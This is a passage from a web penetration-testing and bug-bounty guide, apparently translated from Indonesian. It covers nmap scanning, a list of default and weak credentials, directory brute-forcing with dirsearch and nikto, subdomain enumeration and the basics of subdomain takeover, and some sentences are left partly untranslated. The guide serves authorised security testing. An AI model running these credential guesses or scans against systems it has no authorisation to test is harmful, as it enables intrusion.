2.4. Bug Hunting (Responsible Disclosure / Bug Bounty Program / etc.)

It should be noted that although "Bug Hunting" is basically also done in the security testing activities outlined above, "Bug Hunting" in this context will be narrowed down to the activity of seeking security bugs in open programs such as responsible disclosure and bug bounty programs.

In terms of implementation, such a program would be less appropriate / optimal to release, or to use as the main benchmark for identifying risk, when an application / system has never passed a security testing phase before. In other words, this program will be fairly effective if an application / system is already "considered" safe (because it has passed the testing phase), so that hopefully no more common vulnerabilities that can lead to risk will be found.

Some of the reasons include:

• It is too risky to release an application / system while the application / system itself was built in ignorance of security concepts. Keep in mind that there is generally a difference in discipline between developers and testers. If these differences are not combined in the development process, it can be ascertained that the existing security-related risk will be greater. In summary, releasing anything without making sure of it internally first, and "surrendering it directly to outside parties", is the same as being a danger to oneself.

• On the other hand, a tester who is active in various responsible disclosure programs essentially needs "only" to find one bug to achieve their objective, namely the satisfaction of having successfully helped a company, or the attainment of an acknowledgment and / or reward. Although in practice a tester can still combine several kinds of bugs obtained from various assets to reach a higher risk, this is not something that is often found in reality. The tester's area of focus sometimes becomes the primary concern, giving the impression that there is a "limit" to how far testing is optimized.

• And the other reason is that testers involved in a bug hunting program have no "pressure" to perform an optimal and thorough test, so the test will be carried out according to their own will (with uncertain time and targets as well). In other words, the owner of the application / system certainly cannot "surrender completely" to experts who work in this way.


Imagine if, at the time of release, it turns out there is no bug hunter or researcher testing this application, or interested in / having the time to test it. Surely this will cause a "gap" of its own.

Unfortunately, in practice in the field, there are some tendencies for application owners to make the responsible disclosure / bug bounty program the main action in looking for vulnerability or risk (rather than making it a complementary action), even though in practice there are a lot of companies out there that first fortify themselves before finally "opening up" to the side of the open testing program.

Note: fortifying here can generally be internal testing, increasing the security perimeter, strengthening the policies contained in it, or other things.

Is there a clear example of this? Yes, one that can be used as an example is Google's bug bounty program. When they acquire a company, they declare that they will take up to six (6) months before the acquired company is brought into the "in-scope" bounty. The following is a short excerpt from their official portal:

"Although the reports often deal with real vulnerabilities, we pragmatically decided to establish a six-month blackout period for any newly announced Google acquisitions before they can qualify for a reward."

What does this mean, simply? Some argue that Google wants to ensure that these newly acquired firms have implemented the security standards applied by Google before finally (maybe) moving to Google's internal infrastructure and eventually being left to open testing.

Regardless of the opinions expressed, the common thread that can be drawn from this is: "make sure it has gone through an internal testing process first, and only then release it to the outside".


3. APPROACH OF THIS GUIDE

Specifically, this guide is made to approach, in general overview, the vulnerabilities in the functions that are generally available in a web-based application. Even so, in its implementation, testing that is effective and efficient for a web-based application is commonly done without limiting itself to the application, but also covers the infrastructure and databases used. Some figures are outlined in the following chart:

Figure 9 Web Application Security Assessment

In this situation, the outline is as follows:

1. Information Gathering

This stage is focused on searching for information, concentrating on a few major things such as Network Mapping, Port Scanning, Web Crawling, etc. The purposes of this activity are:

• Knowing the relationship between a system and other systems,

• Knowing which ports are "left" open in a system,

• Knowing the platform / engine used in the application, along with checks against various sensitive directories or files that are "open" to the public.

2. Access Testing

A testing process that places emphasis on an individual's access rights to an application, covering both the authentication and the authorization process.

3. Session Management Testing

A testing activity that aims to ensure that an application has good control in managing the sessions generated for the user. This examination can be an examination of cookies, tokens, or an attempt to predict the session flow.

4. Data Validation Testing

This part of testing is focused on things related to injection. SQL Injection, Cross Site Scripting (XSS) and OS Command Injection are some examples of the tests performed in this section.

5. Logic Testing

In every existing application, business processes are necessarily built differently, even though there may be models with the same functionality. And there is no doubt that the impact of exploiting application logic errors is very large from the business side.

In implementation, this activity is done without the use of automated scanning tools. This is because the assessor will conduct testing using intuition, in this case looking at all the requests and responses sent by either the client or the server.

6. Miscellaneous Checks

In this section, testing activities are carried out on all the things that support the running of an application. The supporting things in question are such as servers (application hosting), database, digital certificate, or other things.


4. TEST SUMMARY BASIS

Before going further into the discussion, this section will first discuss the basic test steps that are generally performed when dealing with a target.

In assessing a system (whether an operating system or an application such as a web application and others), a tester of course cannot be separated from what is called information gathering. It is generally useful for knowing the "state" of what is active and visible on a system. For example, for an operating system, we will be able to know the services that are up on the operating system in question.

As a first step in the information gathering stage for an operating system, testers can generally rely on a simple tool called nmap to "show" the services that are enabled.

Here are a few common commands used to view the active services on an operating system using nmap:

• # nmap -sV ip_target - as an example: # nmap -sV 10.75.100.170 (used to see the active TCP services along with the version used);

• # nmap -sT ip_target - as an example: # nmap -sT 10.75.100.170 (used to see the active TCP services);

• # nmap -sU ip_target - as an example: # nmap -sU 10.75.100.170 (used to see the active UDP services);

• # nmap -A ip_target - as an example: # nmap -A 10.75.100.170 (used to see the overall information on the target, along with some brute force trials using nmap's built-in dictionary).

But when an IP has not yet been obtained, the tester can use the command # nmap -sP IP_segment, as an example # nmap -sP 10.75.100.0/24.

Note:

10.75.100.0 is the segment (commonly called the network ID) in 10.75.100.0/24.

The value 24 in the above command is the subnet mask value of the relevant segment, which comes from 255.255.255.0.

The formula for calculating the segment is:

ip_address AND (logical AND operator) subnet_mask.

For example, for the IP address 10.75.100.170 with subnet mask 255.255.255.0, the segment is 10.75.100.170 AND 255.255.255.0:

10.75.100.170 → 00001010.01001011.01100100.10101010
255.255.255.0 → 11111111.11111111.11111111.00000000
_____________________________________________________ AND
10.75.100.0   → 00001010.01001011.01100100.00000000

Thus, IP 10.75.100.170/24 lies in the segment 10.75.100.0.

The subnet value is 24 because there are twenty-four (24) ones (1) in the subnet mask.
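The segment calculation above, carried out in code as an added example (not code from the book): it applies the formula ip_address AND subnet_mask to the book's case, renders the binary groups of the table, and generalises the /24 case to any contiguous IPv4 mask. The /23 comparison in the usage block is a constructed case, not one from the book.

```python
"""Network segment (network ID) and prefix length from an IPv4 address and
subnet mask, following the formula in the Test Summary Basis section.

Added example, not code from the book. It carries the book's worked case
(10.75.100.170 with mask 255.255.255.0 -> 10.75.100.0/24) and generalises
it to any contiguous IPv4 mask; the /23 case at the bottom is constructed.
"""


def dotted_to_int(addr: str) -> int:
    """Convert a dotted-quad IPv4 string into a 32-bit integer."""
    octets = addr.split(".")
    if len(octets) != 4:
        raise ValueError(f"not an IPv4 address: {addr!r}")
    value = 0
    for octet in octets:
        n = int(octet)
        if not 0 <= n <= 255:
            raise ValueError(f"octet out of range in {addr!r}")
        value = (value << 8) | n
    return value


def int_to_dotted(value: int) -> str:
    """Inverse of dotted_to_int."""
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def to_binary_groups(value: int) -> str:
    """Render a 32-bit value as four 8-bit groups, as in the book's table."""
    bits = f"{value:032b}"
    return ".".join(bits[i:i + 8] for i in range(0, 32, 8))


def prefix_length(mask: str) -> int:
    """Count the leading ones in the mask (the '/24' value); reject masks
    whose ones are not contiguous, since those are not valid subnet masks."""
    m = dotted_to_int(mask)
    ones = bin(m).count("1")
    # A valid mask is `ones` 1-bits followed by zeros, e.g. 255.255.255.0.
    if m != ((0xFFFFFFFF << (32 - ones)) & 0xFFFFFFFF):
        raise ValueError(f"non-contiguous subnet mask: {mask}")
    return ones


def network_segment(ip: str, mask: str) -> str:
    """Apply the book's formula: segment = ip_address AND subnet_mask."""
    segment = dotted_to_int(ip) & dotted_to_int(mask)
    return f"{int_to_dotted(segment)}/{prefix_length(mask)}"


def in_same_segment(ip_a: str, ip_b: str, mask: str) -> bool:
    """True when two hosts fall in the same segment under the given mask,
    i.e. a host-discovery sweep of that segment would cover both."""
    return network_segment(ip_a, mask) == network_segment(ip_b, mask)


if __name__ == "__main__":
    ip, mask = "10.75.100.170", "255.255.255.0"
    print(f"{ip:>15} -> {to_binary_groups(dotted_to_int(ip))}")
    print(f"{mask:>15} -> {to_binary_groups(dotted_to_int(mask))}")
    print(f"segment: {network_segment(ip, mask)}")  # 10.75.100.0/24
    # Constructed /23 case: the mask keeps one bit fewer, so 10.75.101.5
    # lands in the same segment as 10.75.100.170.
    print(in_same_segment(ip, "10.75.101.5", "255.255.254.0"))  # True
```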

For a quick test, testers can generally start by looking for Microsoft Windows-based operating systems first. This does not mean that Windows is a vulnerable operating system, but because of the convenience it provides and the many configurations that need to be done, these operating systems end up having vulnerabilities in several doors.

Thereafter, this test can be specified in two general flows, namely:

1. Finding public services that require human "precision".

Specifically, when doing a quick test, the tester can try to find services that generally require human "precision" in their configuration. This generally ranges over services such as FTP, SSH, Telnet, MySQL, MSSQL, Tomcat, ColdFusion, phpMyAdmin, cPanel, and the like. The main reason for targeting these services is that they have "access" to communicate directly with the operating system (such as putting a file and the like). For example, an attacker could exploit access to MSSQL to run operating system commands through the xp_cmdshell feature.

2. Testing with the basic concept based on three main components.

Broadly speaking, rapid testing of an operating system or a device on the network revolves around three major test components: the account mechanism (account and password), patching (a version that is fairly obsolete / outdated), and configuration.

As a simple example, take FTP. In this situation, the three components in question can be connected to FTP as:

• The use of the account and password in the FTP (a weak combination, or no combination used at all);


• Configuration settings such as anonymous FTP access (can be accessed without the need for a valid account); and

• The application of patches to a version that is somewhat obsolete / outdated.

When one of these three components can be disturbed, there will certainly be a component of information security that is impaired (whether in the form of illegal access to data, or in the context of negating the availability of the data). The details are as follows:

2.1. Tests on the account and password used.

The account and password is one of the main doors that can be encountered by a tester (or an attacker in a real scenario) when faced with an application, which is generally client-server (web, mobile, or desktop).

It has become a reality that is hard to deny that there are still many developers / maintainers of a system who still use weak accounts and passwords. The reasons are quite varied, such as:

• A tight release schedule (thus using a weak account and password for easy management prior to release). Generally, the manager in question will then unintentionally forget to replace it when the asset has been released (into production). On the other hand, the absence of a control against carrying over any dummy data from development becomes another factor that ultimately "supports" the emergence of this issue.

• The different disciplines of knowledge between developers / managers and testers. This is also commonly found because the mindset formed in each area is quite different. Generally, the "support" in the form of a lack of security awareness can also lead to developers / maintainers being unaware of the risks that can happen to them when using a weak account or password.

By exploiting a vulnerability at this point, the tester is also one step closer to being able to get into the overall system.

In reality, the development of the workflow / attack scenario can be connected to the following sides:

• Web-based applications: such as issues related to File Upload, SQL Injection (when logged in) that is associated with reading sensitive files (when the database is used in a mode that can read files internally), as well as other similar things that allow reading or communication with the data contained in the operating system.

• Desktop-based applications: in this situation, we can narrow it down to the services commonly found as outlined above. The subsequent scenario may be reading sensitive files (via SSH / FTP / the like) that can be used to get into other assets contained in the system.

The account and password combinations that are commonly used are like the following (every entry in the username column is also commonly tried as the password):

No.  Username                                   Password
1.   adm                                        password
2.   admin                                      <blank password> / without password
3.   admin                                      P@ssw0rd (with upper- and lower-case P)
4.   administrator                              P4ssw0rd (with upper- and lower-case P)
5.   4dm1n                                      Passw0rd (with upper- and lower-case P)
6.   4dm1n1str4t0r                              Qwerty (with upper- and lower-case Q)
7.   root                                       1qazxsw2 / zaq12wsx
8.   sa                                         12345 (and combinations up to the number 0)
9.   app_name / nama_departemen (department     As well as the default passwords associated with
     name) / nama_pic (name of the person in    the name of a specific product, such as those
     charge) / nama_jalan (street name)         listed at https://cirt.net/passwords and
                                                http://www.phenoelit.org/dpl/dpl.html

2.2. Tests on unapplied patches (obsolete / outdated version).

As a quick note before going further into the discussion at this point, this second condition can be tested either after the tester has gained access to the internals of the application / operating system (by using a weak account and password) or not (without login).

At this stage, the tester is required to map out the version of everything used by the asset under test, such as the operating system version, the version of the CMS / framework of a web-based application, or the version of a desktop-based application that is used (e.g. FTP server, SSH, and others).

From the situation described, it can be seen that testing at this stage has not yet touched the logic side of each application, but rather leans on exploiting a version that is known to be vulnerable and whose exploit code has been released in the public area. For example, the tester finds a PHP File Manager application known to be at version 0.9.8. On this occasion, the tester must first find out about vulnerabilities that may have been released by a researcher for the application in question, which can then be used to get into the system.

It is important to note that because the ultimate goal is to get into the system, the search for vulnerabilities is limited to those that are connected to the server side, not to the client side such as Cross Site Scripting and the like.

2.3. Tests on configuration errors that have been applied.

Unlike the two components noted earlier, in this component the tester is expected to know the general configuration of a service that is active on the asset under test.

Take the FTP service for example. In this service, it is known that there is a configuration that allows one to gain access to the service in question without using a password (the anonymous user), and in some cases this user even has "write" permission. On this occasion, the tester is required to test whether or not the asset owner has enabled the configuration (anonymous access) in question.

3. Searching for sensitive directories or paths that can act as a dashboard.

At this stage, testers are expected to search for information about sensitive paths and directories that may be contained in the asset under test. Of course, in reality, this is more applicable when you want to "deal" with a web-based application.

Why is it necessary to know this? Because in general, a directory or path that serves as the link to the dashboard managing the application has quite a lot of access to the internals of an operating system, for example upload features, CRUD features (which are usually connected directly to the database), and others. With these features obtained, the potential to gain access to the system becomes that much higher.


3.1. Searching through robots.txt

In implementation, a general directory search can be done by visiting the robots.txt file commonly contained in an application.

Specifically, the robots.txt file is basically a file that aims to provide rules to "bots - search engines" not to crawl the directories specified in it. However, from the viewpoint of an attacker, this becomes a short door to knowing where the sensitive directories are located.

For example, an application has a directory / path at http://aplikasi.com/J4ng4nAks3s. However, because the path "J4ng4nAks3s" was placed in robots.txt, an attacker will indirectly be able to know where the directory / path in question is.
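A parser for the robots.txt format discussed above, as an added example that is not part of the book: it follows the file's group structure (User-agent lines open a group, the Disallow / Allow lines after them belong to it) and lists every path the file discloses. The sample robots.txt is constructed and reuses the book's example path /J4ng4nAks3s; the point for a defender is that each Disallow entry is readable by anyone, so the path behind it still needs real access control.

```python
"""Parse a robots.txt and list the paths it discloses.

Added example, not from the book. The sample file below is constructed;
it reuses the book's example path /J4ng4nAks3s. Every Disallow entry is
public information, so listing a path here hides nothing: the resource
behind it must be protected by authentication, not by obscurity.
"""
from collections import OrderedDict

# Constructed sample: two user-agent groups, comments, and an Allow line.
SAMPLE_ROBOTS_TXT = """\
# robots.txt for aplikasi.com (constructed sample)
User-agent: *
Disallow: /J4ng4nAks3s
Disallow: /backup/   # old database dumps
Allow: /public/

User-agent: Googlebot
Disallow: /staging/
Crawl-delay: 10
"""


def parse_robots(text):
    """Return an ordered mapping user-agent -> list of (directive, path).

    One or more consecutive User-agent lines open a group; the Disallow and
    Allow lines that follow belong to every agent in that group. A
    User-agent line appearing after rules starts a fresh group. Comments
    (# ...) and blank lines are ignored, as is any other directive.
    """
    groups = OrderedDict()
    current_agents = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line or ":" not in line:
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            # A User-agent line after rules belongs to a new group.
            if current_agents and any(groups[a] for a in current_agents):
                current_agents = []
            groups.setdefault(value, [])
            current_agents.append(value)
        elif field in ("disallow", "allow") and current_agents:
            # An empty "Disallow:" means "nothing is disallowed" and
            # discloses no path, so it is skipped.
            if value:
                for agent in current_agents:
                    groups[agent].append((field, value))
    return groups


def disclosed_paths(text):
    """All paths a reader learns from the file, regardless of agent, in
    order of first appearance. These are the paths a site owner should
    audit for access control, since robots.txt itself enforces nothing."""
    seen = []
    for rules in parse_robots(text).values():
        for directive, path in rules:
            if directive == "disallow" and path not in seen:
                seen.append(path)
    return seen


if __name__ == "__main__":
    for agent, rules in parse_robots(SAMPLE_ROBOTS_TXT).items():
        print(agent, rules)
    print(disclosed_paths(SAMPLE_ROBOTS_TXT))
```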

3.2. Searching for commonly used directories.

On the other hand, the tester can try to find out about the existence of sensitive pages by guessing the common ones, as well as those recorded in general dictionaries.

Typically, this revolves around:

/adm            /cpanel        /manage
/admin          /dashboard     /manager/html
/administrator  /root          /pma
/4dm1n          /backend       /phpMyAdmin
/cms            /login         and others

Does everything need to be typed one by one? The answer is certainly not. There are applications that can be used to help a tester search for a directory / path, or even sensitive files, quickly, such as dirsearch (see the following link: https://github.com/maurosoria/dirsearch). In implementation, it will be more effective when adding the extension types that you want to look for, as in the following command:

python3 dirsearch.py -u target.com -e .asp,.aspx,.jsp,.php,.csv,.doc,.docx,.xls,.xlsx,.ppt,.pptx,.pdf,.bak,.conf,.config,.old,.sql,.jar,.rar,.zip,.tar,.tar.gz,.apk,.ipa,.cgi,.do,.htm,.html,.js,.json,.rb,.xml,.yml,.svn,.git


4.1. Conclusions on the Use of the Test Summary Basis Method

Armed with the three flows intended (namely "finding public services that require human precision", "testing with the basic concept based on three main components", and "searching for sensitive directories or paths that can act as a dashboard"), testers are indirectly expected to accelerate the testing time in order to achieve the larger main goal, which is to take over an asset that has a lot of relationships with other assets, such as Active Directory.

After such an asset is successfully taken over, testers will be able to analyze the other assets in a relatively shorter time (one of the reasons being that "there is no longer a need to go through the access request process, which is sometimes unlikely to be granted when on the ground").


5. RECONNAISSANCE

In reality, for a tester to determine whether a web-based application exists somewhere, one of the following two pieces of information is of course needed, namely the domain name and the IP address of the target.

1. When you do not know the domain name, it will be difficult to determine the targets to be tested, especially if the company name is generic. A simple example: "Please help me test ABC's app". Obviously this will cause confusion between the ABC trademark in Indonesia and other ABCs whose domain naming may be different, for example abc.com, abc.net, and more. On the other hand, the domain name is often not related at all to the company name. For example, PT Pendekar Pintar, whose domain is https://www.halaman-tertentu.com/; of course it is unlikely that we would look for http://pendekarpintar.com/.

From this it can be concluded that it would be better if the testers know the domain name to be tested.

2. If the domain name is not known, then at least the tester knows the IP to be tested. And when the IP is known, of course the tester should re-do the initial stage, i.e. port scanning. As for the results of port scanning, simply aim at the TCP output that has the HTTP or HTTPS protocol, which are the protocols commonly used by an application to communicate.

The question is, will it be that easy to know the application by knowing the IP? The answer is unfortunately no, because there are situations where one IP has many applications, so we need information in the form of the "path" of the application. Example:

• The application abc.com is located at IP http://10.20.30.40/abc

• The application xyz.com is located at IP http://10.20.30.40/xyz

Nevertheless, in spite of the steps required to search for the domain name and the path (which of course will be covered in this guide), these two pieces of information, knowing the domain name or the IP, have of course already become one of the opening doors for testers to know whether there is an application in it.

As a reminder, when encountering an IP and wanting to know the services that may be up on the IP in question, the tester can perform port / service scanning with tools such as nmap, as noted in the "Test Summary Basis".


5.1. Finding Sub-Domain of One Target

5.1.1. Reverse IP Lookup Method (Use of the Same Server)

Generally when an examiner has found that the main domain of one target, of course it

This can simplify the steps to perform testing of the web application itself.

However, the main domain is often not a target "good" to be attacked since

beginning (of course, this statement is issued by the exception).

Then why the primary domain is not a good target to be attacked from the start?

Simply put, when the main domain being the target is the property of something

companies / large organizations (let alone to open a bug bounty program), then it can be

ascertained that there are so many individuals who test which would be expected to

beriringnya monitoring activity of the perusahaa / organization as well as improvements to the serangan-

successful attack (affect risk).

On the other hand, the developer will always exert maximum effort to

make sure that the primary domain is secure, or even minimize the features available on the

The main domain so testers really would be difficult to "do something".

Note: Then why is there an exception to the statement above? For the authors, the situation in Indonesia is unique, because it is often found that the main domain is also vulnerable to attack, so it cannot be left out as "part of the test target" (except when the target company / organization has a policy that generally requires security testing under the related regulations).

Now back to the initial topic. Why look for sub-domains of the primary domain (even though the objective may remain the primary domain)? The reason is actually quite simple. In hacking activity, an attacker will never be partial about the target addressed. As long as he can reach the main target, a wide selection of test methods will be taken by themselves, including attacks on the available sub-domains.

On the other hand, every company / organization (including big names) has its own culture, so the development of an application in business unit A will not necessarily be similar to development in business unit B. This is even more so when the company acquires another company, which certainly has a different development culture.

Then, what should be done when searching for sub-domains?

Quite a lot, of course. What the authors commonly do (when the main priority is to "enter" the primary domain) is to start by looking for sub-domains on the same IP used by the primary domain. The purpose is that when a tester can hack into a sub-domain that has the same IP as the primary domain and get into the operating system being used, that tester can be said to be one step closer to getting into the data on the primary domain.

For example, the authors randomly take the novell.com domain as the main target. In this situation, the authors will try to find other domains that might exist on the IP used by novell.com.

To start, the necessary steps are quite simple. Testers can use online tools found with the keyword "Reverse IP Lookup". The results here will focus on the "You Get Signal" and "HackerTarget" services.

Figure 10 Reverse IP Lookup with "You Get signal"

From the results, it can be seen that there are sub-domains (outside the main domain) hosted on the related IP. Because the sub-domains in question use the same IP as novell.com, there is a possibility that "they" also sit on the same operating system. In this context, luckily there are no other domains that do not belong to novell.com (which can generally happen on shared hosting).

Vital note: an identical IP does not mean being on the same operating system. Moreover, this is just one way to open up wider lines of testing in order to reach the objective on the main target.


5.1.2. Sub-Domain Enumeration with Automation Tools

Often, a tester needs a list of sub-domains owned by a domain so that they can then be used as targets in the hacking. The reason is quite simple: testers will always look for the possibility that one of these sub-domains, once hacked, is linked to the main domain.

A simple example is the success story of bypassing CAPTCHA protection on the main asus.com portal thanks to the discovery of a "direct access" to the registration and login section in one of their mobile applications that can be downloaded through the PlayStore. This story indirectly also reminds us that the development "culture" in one business unit will differ from another, especially if there is no organized control, or perhaps because of activity that "bypasses" the regulations that have been applied.

As a preliminary, it should be noted that sub-domain search methods are generally always tied to a dictionary combined with various search engines. A simple example: there is a sub-domain called asdasd.target.com. When "asdasd" is not among the keywords in a dictionary and is not detected by any search engine, it is certain that this sub-domain cannot be found (unless it has been disclosed by the owner).

Note: one dictionary that is quite large and continuously updated is the one made by Jason Haddix, which can be seen at: https://gist.github.com/jhaddix/f64c97d0863a78454e44c2f7119c2a6a

To quickly find out the list of sub-domains of a target (without opening a notebook, for example a quick test from a smartphone), testers can usually use the VirusTotal.com service. In addition to functioning as a platform for detecting malware in a file or link, VirusTotal can also be used to see the sub-domains contained within a primary domain. Its use is quite simple: testers only need to go to the portal https://www.virustotal.com/#/home/search and then enter the desired link.

Figure 11 Sub-Domain Search page on VirusTotal


On this occasion, novell.com will again be entered as the link, so that the information in the form of detected sub-domains can be seen.

Figure 12 Found 100+ Sub-domains

When a domain belonging to novell.com is entered, the service will automatically detect the sub-domains that have become part of the database owned by VirusTotal.

It should be noted that in addition to enumerating the sub-domains of the primary domain, this service is also capable of detecting sub-domains of other sites that are "allegedly" linked (named siblings) to the domain that was entered. Nevertheless, the results displayed under "Siblings" are somewhat less than maximal, because its detection is limited.


Here is a brief glimpse of the enumeration results in question:

Figure 13 Example Simple Enumeration Results

Now, to test in more depth (no longer just viewing from VirusTotal), some other tools that are commonly used and quite powerful for this are:

• Sublist3r - https://github.com/aboul3la/Sublist3r

Very fast, but do not make this tool the only choice. Generally Sublist3r is only used as an opener so the search process can be done quickly. However, to obtain detailed sub-domain information, it is recommended to choose other tools.

• amass - https://github.com/caffix/amass

Good because it can be combined with various engines such as Shodan, Censys, VirusTotal, and others (through the API of each service), so that the information obtained will be more optimal.

The methods used consist of crawling web archives, permuting / altering names, and DNS reverse sweeping. The positive thing is that this tool continues to be updated (most recently on March 11, 2019 at the time of writing) and has become part of the OWASP project ( https://github.com/OWASP/Amass ).


• Subfinder - https://github.com/subfinder/subfinder

Approximately the same as amass, which has been combined with the use of a variety of engines. It is advisable to use both (amass and Subfinder).

Based on the research conducted and presented by Jason Haddix in "Bug Hunter Methodology v3", the following is a comparison table of the existing tools:

Figure 14 Table Comparison of Sub-Domain Enumeration Tools

And here is a small picture of the results of using sub-domain enumeration tools against bitdefender.com:

Figure 15 Few of the Sub-Domains at bitdefender.com


5.2. Seeing the state of the Target Sub-Domains

5.2.1. Directory / File Brute Force

A search for information about a target is not complete unless accompanied by a step to identify the directories that may exist on the intended target.

Why is this necessary? As noted in the summary of the basic test, in general the directory or path that acts as the entrance to the application's administrative dashboard has considerable access to the internals of an operating system, for example upload features, CRUD features (which usually connect directly to the database), and others. By obtaining the features mentioned, the potential to achieve access to the system becomes even higher.

To keep this guide sequential, this will be discussed again along with some of the additional steps needed in this regard.

1. Search through robots.txt

The first thing to do is of course to view robots.txt.

Specifically, the robots.txt file is basically a file that aims to give rules to "bots - search engines" not to crawl the directories specified in it. However, from the viewpoint of an attacker, it becomes a shortcut to knowing where sensitive directories are located.

For example, an application has a directory / path at http://aplikasi.com/J4ng4nAks3s ; however, because the path "J4ng4nAks3s" was placed in robots.txt, an attacker would indirectly be able to learn where the directory / path in question is.
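
The point above is that every Disallow line is also a map of what the owner considers sensitive, so a defender should review their own robots.txt with the same eyes. The following is an added example (not code from the book): a small parser that lists the disallowed paths per user-agent and marks the ones whose names hint at administrative or leftover content, using the guessing words the book itself lists in the next step. The robots.txt text and the hint list are constructed for the demonstration.

```python
"""Parse a robots.txt file and list the paths it asks crawlers not to visit.

Added example, not code from the book. SAMPLE_ROBOTS and SENSITIVE_HINTS are
constructed for the demonstration.
"""

SAMPLE_ROBOTS = """\
# constructed sample, not a real site
User-agent: *
Disallow: /J4ng4nAks3s/
Disallow: /backup/
Allow: /public/

User-agent: Googlebot
Disallow:

User-agent: BadBot
Disallow: /
"""

# Path fragments that commonly mark administrative or leftover content
# (constructed list, taken from the guessing names the book gives later).
SENSITIVE_HINTS = ("admin", "adm", "backend", "backup", "cpanel", "pma",
                   "phpmyadmin", "manage", "dashboard", "login", "root", "cms")


def parse_robots(text):
    """Return {user_agent: [disallowed paths]} for each group in robots.txt.

    Consecutive User-agent lines share one rule set; a blank line or a new
    User-agent line after rules starts a new group. An empty Disallow value
    permits everything and is therefore not recorded as a path.
    """
    groups = {}
    agents = []
    expecting_agents = True
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line:
            agents, expecting_agents = [], True  # blank line closes the group
            continue
        if ":" not in line:
            continue  # not a directive
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            if not expecting_agents:
                agents = []  # rules were already seen: this is a new group
            expecting_agents = True
            agents.append(value)
            groups.setdefault(value, [])
        elif field == "disallow":
            expecting_agents = False
            if value:
                for agent in agents:
                    groups[agent].append(value)
        else:
            expecting_agents = False  # Allow, Sitemap, Crawl-delay, ...
    return groups


def flag_sensitive(groups):
    """Sorted disallowed paths whose name contains one of SENSITIVE_HINTS."""
    flagged = set()
    for paths in groups.values():
        for path in paths:
            lowered = path.lower()
            if any(hint in lowered for hint in SENSITIVE_HINTS):
                flagged.add(path)
    return sorted(flagged)


if __name__ == "__main__":
    parsed = parse_robots(SAMPLE_ROBOTS)
    for agent, paths in parsed.items():
        print(f"{agent}: {paths}")
    print("review these entries:", flag_sensitive(parsed))
```

Note that the leetspeak path /J4ng4nAks3s/ is listed by the parser but not flagged by the keyword check, while /backup/ is: keyword matching only catches conventional names, so the full Disallow list, not just the flagged subset, is what should be reviewed.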

2. Automation Directory / File Brute Force

On the other hand, testers can try to find the existence of sensitive pages by guessing common names, as well as those recorded in general dictionaries.

Typically, this revolves around names such as:

/adm, /cpanel, /manage, /admin, /dashboard, /manager, /html, /administrator, /root, /pma, /4dm1n, /backend, /phpMyAdmin, /cms, /login, and others.

In the implementation, a tester can use various automation tools that help search for sensitive directories / paths or even files rapidly, such as dirsearch (available at https://github.com/maurosoria/dirsearch ). It will be more effective when the extension types to look for are added, as in the following example command (dirsearch takes the extensions as one comma-separated list after -e, without leading dots):

python3 dirsearch.py -u target.com -e asp,aspx,jsp,php,csv,doc,docx,xls,xlsx,ppt,pptx,pdf,bak,conf,config,old,sql,jar,rar,zip,tar,tar.gz,apk,ipa,cgi,do,htm,html,js,json,rb,xml,yml,svn,git

It should be noted that it is recommended to execute this tool several times, each time it manages to find a particular directory.

A simple example: a tester wants to find directories / files that may exist at http://10.20.30.40/ . When using this tool, it will automatically brute-force based on its built-in dictionary. Let's say the tool finds the following:

Figure 16 Scanning is Completed

Afterwards, the tester must re-run the scanner against the directories / files found. On this occasion, there is potential for the scanner to find a sensitive file in them, such as .git or .svn.


5.2.2. Directory / File Brute Force Part II - Web Crawling

Still on the same topic, but with a different tool: one tool that is also quite powerful for seeing the state of a domain / sub-domain (in the context of knowing its files or directories), other than dirsearch, is nikto ( https://github.com/sullo/nikto ).

By default, nikto is installed in Kali Linux and can be called directly without having to enter a specific directory. Specifically, nikto is used to find paths or directories that can be accessed by the public. The larger the database it owns, the better this tool becomes.

In the implementation, the resulting output takes somewhat longer because nikto will crawl first. However, it is still recommended to use this variant of testing rather than relying on just one type of automation scanner.

How to use it is quite simple. Testers only need to enter the command:

# nikto -h target.com

or

# nikto -h sub-domain.target.com

To scan the HTTPS side, simply add the option -p 443 (if HTTPS is on the default port, 443). It should be noted that web crawling has a different context from directory brute force. In web crawling, the tool will try to see every link and execute every path it finds (to view sensitive content or potential issues that may arise).

5.3. Conclusion Basic Reconnaissance Phase

Of course, the ways to search for as much information as possible about a target are not limited to the matters presented in this guide. In reality, the ways of searching for information related to a domain, shared hosting, and the directories or files on a target will continue to grow and not stagnate on the issues discussed in this guide. However, this guide alone can be the basis for testers to look for more about the target.

Going forward, this guide will discuss the common vulnerabilities that need to be tested further, in order to minimize the risks inherent in a system.


5.4. Reconnaissance References

As supplementary information, the following are some references related to the discussion of reconnaissance:

• Default Passwords: https://cirt.net/passwords

• Default Password List: http://www.phenoelit.org/dpl/dpl.html

• Reverse IP Lookup: https://www.yougetsignal.com/tools/web-sites-on-web-server/

• Fast subdomains enumeration tool for penetration testers: https://github.com/aboul3la/Sublist3r

• Amass - In-depth and Network Mapping DNS Enumeration: https://github.com/caffix/amass

• Amass - In-depth and Network Mapping DNS Enumeration: https://github.com/OWASP/Amass

• Subfinder - subdomain discovery tool that discovers valid subdomains for websites:

https://github.com/subfinder/subfinder

• Open Source (GPL) web server scanner: https://github.com/sullo/nikto

• Bug Hunter Methodology v3 by Jason Haddix: https://docs.google.com/presentation/d/1R-3eqlt31sL7_rj2f1_vGEqqb7hcx4vxX_L7E23lJVo/edit?usp=sharing

• [Video] Bug Hunter Methodology v3 by Jason Haddix:

https://youtube.com/watch?v=Qw1nNPiH_Go


6. SUB-DOMAIN TAKEOVER

Having previously described the ways that can be used to obtain the sub-domains of a target, this section will gradually discuss the things to do after finding the list of sub-domains in question, one of which is related to sub-domain takeover.

6.1. The Basics of Sub-Domain Takeover

In summary, sub-domain takeover is a trick that "allows" an attacker to take over a sub-domain belonging to the target because that sub-domain is pointing to a third party whose status is expired. In other words, because the sub-domain has been pointed at a service whose lease term has expired, this allows someone to take over the account referred to by renting it again.

The technique itself is described in detail by a company named Detectify and by a researcher named Patrik Hudak on their respective blogs.

6.2. Basic Concepts Sub-Domain Takeover

Figure 17 General Flow of Communication - https://0xpatrik.com/subdomain-takeover-basics/


